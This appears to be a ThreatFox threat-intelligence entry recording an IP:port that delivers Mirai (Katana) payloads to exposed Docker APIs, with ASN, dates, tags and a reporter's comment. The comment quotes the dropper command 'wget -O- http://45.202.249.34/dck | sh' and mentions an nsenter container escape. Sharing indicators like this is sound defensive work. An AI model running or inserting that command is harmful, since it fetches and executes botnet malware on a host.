ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 45.202.249.34:80.

Database Entry

Add tag Delete this IOC  Report False Positive Export IOC (JSON)    Export IOC (CSV)
IOC ID:1822244
IOC: 45.202.249.34:80
IOC Type :ip:port
Threat Type :payload_delivery
Malware: Mirai
Malware alias:Katana
Confidence Level : Confidence level is high (80%)
Is compromised? : False
ASN:AS61112 AkileCloud
Country:- GB
First seen:2026-06-04 07:31:57 UTC
Last seen:never
UUID:42c20f44-5fe7-11f1-a345-42010aa4000a
Reporter nullblue67
Reward 5 credits from ThreatFox
Tags:docker-api Dropper infra-rotation Mirai nsenter-escape
Reference: https://twitter.com/NullBlue67

Avatar
nullblue67
NEW Docker dropper C2 - infrastructure rotation by operator 45.198.224.5 who previously used 151.242.125.187. Base64-encoded payload: wget -O- http://45.202.249.34/dck | sh. Same nsenter container escape MO. 2026-06-04 NullBlue67